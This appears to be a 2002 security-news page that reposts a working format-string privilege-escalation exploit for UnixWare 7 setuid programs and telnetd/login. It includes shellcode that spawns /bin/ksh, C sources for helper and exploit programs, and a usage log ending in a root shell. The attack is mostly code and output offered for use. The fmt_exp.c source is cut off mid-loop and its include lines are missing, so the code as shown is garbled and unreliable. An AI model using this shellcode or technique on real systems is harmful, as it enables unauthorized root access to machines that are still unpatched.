Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Unixware Message catalog exploit code

Unixware Message catalog exploit code

by Nikola Strahija on February 11th, 2002 This exploit is fixed already. Hacker can modify message catalog and, It can possible format string exploit.


$ gcc -o expshell expshell.c
$ gcc -o getret getret.c
$ gcc -o fmt_exp fmt_exp.c
$ ./expshell
$ ./getret
e=8047af7
$ ./fmt_exp 0x8047af7 16 ( 16 is offset )
...........(wait 30 minutes ). ......

# id
uid=0(root) gid=3(sys) ......................

This can exploit all of unixware 7 setuid/setgid
command.

Also, can exploit telnetd and login.

example)
$ telnet
telnet> env def LC_MESSAGES /tmp
telnet> o localhost
Trying....
.....
login: blah blah..
password: blah.. blash..
...... (wait 30 minutes.. )
#

------------------------------------------------
Korean security forum
http://www.forsecure.com
http://www.netemperor.com
------------------------------------------------

Here is code.

------------------ expshell.c ------------------
#include

char shellcode[]=
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"xebx1a" /* jmp */
"x33xd2" /* xorl %edx,%edx */
"x58" /* popl %eax */
"x8dx78x14" /* leal 0x14(%eax),%edi */
"x57" /* pushl %edi */
"x50" /* pushl %eax */
"xab" /* stosl %eax,%es:(%edi) */
"x92" /* xchgl %eax,%edx */
"xab" /* stosl %eax,%es:(%edi) */
"x88x42x08" /* movb %al,0x8(%edx)
*/
"x83xefx3b" /* subl $0x3b,%edi */
"xb0x9a" /* movb $0x9a,%al */
"xab" /* stosl %eax,%es:(%edi) */
"x47" /* incl %edi */
"xb0x07" /* movb $0x07,%al */
"xab" /* stosl %eax,%es:(%edi) */
"xb0x0b" /* movb $0x0b,%al */
"xe8xe1xffxffxff" /* call */
"/bin/ksh"
;

main(int argc, char *argv[])
{
char buff[1024];

sprintf(buff, "EGG=%s", shellcode);
putenv(buff);

putenv("LC_MESSAGES=/tmp");
system("/usr/bin/tcsh");
}
---------------------------------------------------------------

---------------- getret.c --------------------
main()
{
char *a;
a = getenv("EGG");
printf ("e=%pn", a);
}
-----------------------------------------------

---------------- fmt_exp.c -----------------------------
#include
#include "shellcode.h"

/* This is base of format string return address */
/* Base address of vxprint is 0x20c7c(134268) */
#define BASE 134268

main(int argc, char *argv[])
{
FILE *fp;
char *retaddr;
long g_len, offset;
int count, count2, line=700, n=19;

if(argc 3) {
printf("Usage: %s ret-address offsetn", argv[0]);
exit(1);
}

retaddr = argv[1];
if(argc == 3) offset = atol(argv[2]);
else offset = 0;

g_len = strtol(retaddr, NULL, 16);
g_len -= BASE;
g_len += offset;

fp = fopen("testdef", "w+");
if(fp == NULL) {
fprintf(stderr, "can not open file.n"); exit(1);
}
for(count=0; count


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »